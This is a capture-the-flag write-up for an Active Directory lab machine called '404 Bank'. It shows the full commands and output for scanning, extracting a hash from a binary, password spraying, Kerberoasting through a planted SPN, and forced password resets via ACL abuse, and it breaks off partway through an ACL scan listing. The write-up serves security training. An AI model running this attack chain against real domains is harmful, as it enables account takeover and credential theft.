404 Bank
Active Directory Machine
404 Bank
Enumaration
The first thing to do is run an Nmap scan to identify the open ports and services.
From the scan results, we can observe that we are dealing with an Active Directory environment, which is essentially the core idea of this challenge.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
> sudo nmap -p- -T4 10.1.60.192 -sCV
Nmap scan report for 10.1.60.192
Host is up (0.16s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 404 Finance Group
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-22 17:44:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
|_ssl-date: 2026-06-22T17:45:38+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-06-22T17:45:38+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-06-22T17:45:38+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: 404finance.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-06-22T17:45:38+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-404.404finance.local
| Not valid before: 2026-06-22T17:22:16
|_Not valid after: 2027-06-22T17:22:16
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-404.404finance.local
| Not valid before: 2026-01-27T22:25:59
|_Not valid after: 2026-07-29T22:25:59
|_ssl-date: 2026-06-22T17:45:38+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: FINANCE404
| NetBIOS_Domain_Name: FINANCE404
| NetBIOS_Computer_Name: DC-404
| DNS_Domain_Name: 404finance.local
| DNS_Computer_Name: DC-404.404finance.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-22T17:44:58+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49727/tcp open msrpc Microsoft Windows RPC
49828/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC-404; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-06-22T17:45:00
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 636.37 seconds
The challenge does not provide us with a foothold, which means that gaining a foothold is our mission.
The nmap scan results reveal an HTTP service running on port 80, which warrants further enumeration.
Navigating to port 80, we are presented with the homepage of 404 Finance Group, a fictional banking website.
However, the most notable finding is located within the Services section, which hosts a downloadable binary named CorpBankDialer.exe.
Gaining Foothold
After downloading the binary, we can perform a quick analysis using the strings tool.
Examining the output, we can identify a base64 encoded string
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
> strings CorpBankDialer.exe
/lib64/ld-linux-x86-64.so.2
__libc_start_main
__cxa_finalize
printf
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
Welcome to CorpBank SecureAccess v3.7.2\n
DEBUG: ZGQy***************************************=\n
;*3$"
GCC: (Debian 14.2.0-19) 14.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
CorpBankDialer.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
printf@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.note.gnu.property
.note.gnu.build-id
.interp
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.note.ABI-tag
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
Decoding the base64 string yields an MD5 hash.
1
2
> echo 'ZGQyZWYzNDUzMGRlN2U1YmVmMjJhMDVlN2U1ZGQxNzg=' | base64 -d
dd2ef34530de7e5bef22a05e7e5dd178%
Then the md5 hash can be cracked using tools such as hashcat, john the ripper, or online using CrackStation.
Now we have the password, but we need to find the username !
The password is likely belonging to one of the IT staff members, as it was found embedded within a binary file.
On the home page of the website, there are 3 team members listed, one of whom is an IT staff member, who is likely associated with this password.
Since we don’t know the username format used in this domain, we can use the username-anarchy tool to generate a wordlist containing all possible username combinations.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
> ./username-anarchy Karl Hackermann > usernames
> cat username
karl
karlhackermann
karl.hackermann
karlhack
karlh
k.hackermann
khackermann
hkarl
h.karl
hackermannk
hackermann
hackermann.k
hackermann.karl
kh
Now we have a password and a username wordlist, so let’s attempt a password spraying attack.
We’re on the right track ! we successfully obtained a foothold.
1
2
3
4
5
6
> nxc smb 10.1.60.192 -u usernames -p 'P************'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [-] 404finance.local\karl:P************ STATUS_LOGON_FAILURE
SMB 10.1.60.192 445 DC-404 [-] 404finance.local\karlhackermann:P************ STATUS_LOGON_FAILURE
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\karl.hackermann:P************
Now, let’s enumerate further into this domain.
Jumping to tom.reboot
First, generate a hosts file for the target domain.
1
2
3
4
5
6
> nxc smb 10.1.60.192 -u karl.hackermann -p 'P************' --generate-hosts-file host
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\karl.hackermann:P************
> cat host
10.1.60.192 DC-404.404finance.local 404finance.local DC-404
Next, I performed a quick scan for dangerous ACL misconfigurations that our foothold user has over the domain objects.
Find my tool here : aclhug
I found that our foothold user has WriteAllProperties permission over the user tom.reboot, which can be leveraged to perform a kerberoasting attack.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u karl.hackermann -p 'P************'
AD ACL Hunter
Time : 2026-06-22 15:03:06 EDT
User : karl.hackermann
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'karl.hackermann'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1103
[+] DN : CN=Karl Hackermann,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1103...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › karl.hackermann [user]
Summary: 🟠 HIGH: 1
🟠 HIGH WriteAllProperties
Target : tom.reboot [top | person | organizationalperson | user]
DN : CN=Tom Reboot,CN=Users,DC=404finance,DC=local
Rights : ReadControl, WriteAllProperties[no-GUID], ReadProperty, ListChildren
Technique : Write any attribute (WriteProperty with no GUID restriction)
Methods : shadow-credentials, set-spn, set-rbcd, set-scriptpath, set-primary-group, write-alt-sec-ids
Attack : Same as GenericWrite — write any attribute without restriction.
ACE Type : ACCESS_ALLOWED_ACE
We can use the bloodyAD tool to set an SPN on the target user.
1
2
> bloodyAD --host 10.1.60.192 -d 404finance.local -u karl.hackermann -p 'P************' set object tom.reboot ServicePrincipalName -v 'sys/service' --raw
[+] tom.reboot's ServicePrincipalName has been updated
We can then use the netexec tool to perform the Kerberoasting attack.
1
2
3
4
5
6
7
> nxc ldap 10.1.60.192 -u karl.hackermann -p 'P************' --kerberoasting output.txt
LDAP 10.1.60.192 389 DC-404 [*] Windows 10 / Server 2019 Build 17763 (name:DC-404) (domain:404finance.local) (signing:None) (channel binding:Never)
LDAP 10.1.60.192 389 DC-404 [+] 404finance.local\karl.hackermann:P************
LDAP 10.1.60.192 389 DC-404 [*] Skipping disabled account: krbtgt
LDAP 10.1.60.192 389 DC-404 [*] Total of records returned 1
LDAP 10.1.60.192 389 DC-404 [*] sAMAccountName: tom.reboot, memberOf: [], pwdLastSet: 2025-07-02 14:07:16.814798, lastLogon: 2025-07-01 15:37:45.167151
LDAP 10.1.60.192 389 DC-404 $krb5tgs$23$*tom.reboot$404FINANCE.LOCAL$404finance.local\tom.reboot*$0640e7548589f7c88bc707d1.....
We can now crack the tom.reboot hash using hashcat with mode 13100.
1
> hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt
Now we hace access as tom
Jump to robert.graef
I performed again a quick scan for dangerous ACL misconfigurations that tom has over the domain objects.
I found that tom user has ForceChangePassword permission over the user robert.graef
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u karl.hackermann -p 'P************' -t tom.reboot
AD ACL Hunter
Time : 2026-06-22 15:38:34 EDT
User : karl.hackermann
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'tom.reboot'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1104
[+] DN : CN=Tom Reboot,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1104...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › tom.reboot [user]
Summary: 🟠 HIGH: 1
🟠 HIGH ForceChangePassword
Target : robert.graef [top | person | organizationalperson | user]
DN : CN=Robert Graef,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
════════════════════════════════════════════════════════════════════════════════
We can use again the bloodyAD tool force change robert password.
1
2
> bloodyAD --host 10.1.60.192 -d 404finance.local -u tom.reboot -p 'P**********' set password robert.graef 'Password@123'
[+] Password changed successfully!
Make sure the password has really changed !
1
2
3
> nxc smb 10.1.60.192 -u robert.graef -p 'Password@123'
SMB 10.1.60.192 445 DC-404 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-404) (domain:404finance.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.60.192 445 DC-404 [+] 404finance.local\robert.graef:Password@123
Jump to daniel.hoffmann
A quick scan again for dangerous ACL misconfigurations that robert has over the domain objects.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
> python3 aclhug.py --dc-ip 10.1.60.192 -d 404finance.local -u robert.graef -p 'Password@123'
AD ACL Hunter
Time : 2026-06-22 16:19:50 EDT
User : robert.graef
Domain : 404finance.local
DC IP : 10.1.60.192
Base DN : DC=404FINANCE,DC=LOCAL
[*] Connecting...
[+] Connection established
[*] Resolving 'robert.graef'...
[+] SID : S-1-5-21-2956725473-317782918-2795636496-1105
[+] DN : CN=Robert Graef,CN=Users,DC=404finance,DC=local
[+] Type : User
[*] Paged ACL scan (page_size=500)...
[*] Scanning 255 objects for SID S-1-5-21-2956725473-317782918-2795636496-1105...
[████████████████████] 100% (255/255)
════════════════════════════════════════════════════════════════════════════════
🎯 ACL Results › robert.graef [user]
Summary: 🟠 HIGH: 29
🟠 HIGH WriteUserAccountControl
Target : svc.services [top | person | organizationalperson | user]
DN : CN=Service Account,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Web Admins [top | group]
DN : CN=Web Admins,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : webadmin [top | person | organizationalperson | user]
DN : CN=Alex Meier,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : daniel.hoffmann [top | person | organizationalperson | user]
DN : CN=Daniel Hoffmann,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH ForceChangePassword
Target : melanie.kunz [top | person | organizationalperson | user]
DN : CN=Melanie Kunz,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : melanie.kunz [top | person | organizationalperson | user]
DN : CN=Melanie Kunz,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH ForceChangePassword
Target : jan.tresor [top | person | organizationalperson | user]
DN : CN=Jan Tresor,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : jan.tresor [top | person | organizationalperson | user]
DN : CN=Jan Tresor,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH ForceChangePassword
Target : nina.inkasso [top | person | organizationalperson | user]
DN : CN=Nina Inkasso,CN=Users,DC=404finance,DC=local
Rights : ForceChangePassword
Technique : Password Reset (no current password required)
Methods : force-change-password
Attack : Reset the target's password to anything — immediate account
takeover.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE
GUID : 00299570-246d-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : nina.inkasso [top | person | organizationalperson | user]
DN : CN=Nina Inkasso,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : robert.graef [top | person | organizationalperson | user]
DN : CN=Robert Graef,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : tom.reboot [top | person | organizationalperson | user]
DN : CN=Tom Reboot,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : karl.hackermann [top | person | organizationalperson | user]
DN : CN=Karl Hackermann,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : DnsUpdateProxy [top | group]
DN : CN=DnsUpdateProxy,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : DnsAdmins [top | group]
DN : CN=DnsAdmins,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Protected Users [top | group]
DN : CN=Protected Users,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Cloneable Domain Controllers [top | group]
DN : CN=Cloneable Domain Controllers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Enterprise Read-only Domain Controllers [top | group]
DN : CN=Enterprise Read-only Domain Controllers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Denied RODC Password Replication Group [top | group]
DN : CN=Denied RODC Password Replication Group,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Allowed RODC Password Replication Group [top | group]
DN : CN=Allowed RODC Password Replication Group,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : RAS and IAS Servers [top | group]
DN : CN=RAS and IAS Servers,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Group Policy Creator Owners [top | group]
DN : CN=Group Policy Creator Owners,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Domain Guests [top | group]
DN : CN=Domain Guests,CN=Users,DC=404finance,DC=local
Rights : WriteUserAccountControl, ReadProperty
Technique : Modify userAccountControl — enable delegation, disable pre-auth, unlock account
Methods : write-uac → enable-unconstrained-delegation, write-uac → set-DONT_REQUIRE_PREAUTH → ASREPRoast
Attack : Set DONT_REQUIRE_PREAUTH to enable ASREPRoasting. Or enable
TRUSTED_FOR_DELEGATION to turn the account into an unconstrained
delegation target.
ACE Type : ACCESS_ALLOWED_OBJECT_ACE [inherited]
GUID : 4c164200-20c0-11d0-a768-00aa006e0529
🟠 HIGH WriteUserAccountControl
Target : Domain Users [top | group]
